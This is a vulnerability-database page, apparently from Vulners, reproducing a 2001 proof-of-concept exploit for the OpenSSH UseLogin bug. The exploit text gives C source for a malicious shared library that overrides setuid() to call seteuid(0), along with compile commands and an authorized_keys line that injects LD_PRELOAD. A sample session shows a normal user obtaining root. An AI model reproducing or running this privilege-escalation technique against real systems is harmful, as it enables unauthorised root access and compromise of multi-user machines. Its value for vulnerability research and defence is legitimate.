Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

UseLogin.txt

🗓️ 09 Dec 2001 00:00:00Reported by WarType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 46 Views

Exploit OpenSSH UseLogin bug to gain root access using LD_PRELOAD technique.

Code
`--[ OpenSSH UseLogin bug proof of concept exploit ]--  
by [WaR] <[email protected]> / http://www.genhex.org  
  
  
--[ Intro ]--  
  
I was very curious in finding out how to exploit this problem. Although  
I don't think anyone uses this feature, I looked into the matter anyway.  
Here it goes. It was tested on the following platforms:  
- Slackware 7.1 with OpenSSH3.0p1  
- RedHat 7.1 with OpenSSH_2.9p2  
- RedHat 7.2 with OpenSSH-3.0.1p1 (thx scorpio)  
- OpenBSD 2.9 with OpenSSH_2.9 (thx pmsac)  
The exploit should work as long as UseLogin does. YMMV.  
  
This is based on libroot from [email protected],  
published a few years ago for exploiting the telnetd LD_PRELOAD bug (and  
you thought it wouldn't happen again...).   
  
Kudos to [email protected] for his help figuring out the problem with   
the Slackware UseLogin, testing on OpenBSD, and giving the ideia for  
the seteuid(0) (it originally was a system("/bin/sh");).  
  
  
--[ Code ]--   
  
Create a lib.c file with the next content:  
  
---8<---  
#include <stdio.h>  
int setuid(int uid){  
printf("setuid() called...\n");  
seteuid(0);  
}  
---8<---  
  
Compile it into a library:  
gcc -c -o lib.o lib.c  
ld -shared -o libroot.so lib.o  
chmod 755 ./libroot.so  
  
  
Now, for the tricky (*g*) part...  
  
You must have an account on the machine, and create an entry  
on $HOME/.ssh/authorized_keys (or authorized_keys2) with:  
  
environment="LD_PRELOAD=<your home>/libroot.so" <your public key>  
  
When sshd receives your connection, it will export this variable  
into the environment *BEFORE* running login. Somewhere after this,  
it executes a setuid. When it does, it makes a seteuid(0).  
  
$ id  
uid=1000(war) gid=100(users) groups=100(users)  
$ ssh war@localhost  
Enter passphrase for key '/home/war/.ssh/id_dsa':  
sh-2.04# id  
uid=0(root) gid=100(users) groups=100(users)  
  
  
It also works remotely. Anyway, you _MUST_ have an account on  
the victim machine so you can setup the enviroment, and login.  
And obviously (duh) it must have UseLogin enabled.  
  
That's all.  
  
  
shout outs to Zav @ genhex.org, Smil3r, and everyone at phibernet.org.   
  
  
-- [WaR]  
"If you can't hack it, hit it with a hammer"  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
09 Dec 2001 00:00Current
7.4High risk
Vulners AI Score7.4
openssh uselogin exploitroot accessld_preload techniqueslackware platformredhat platformopenbsd platform.
46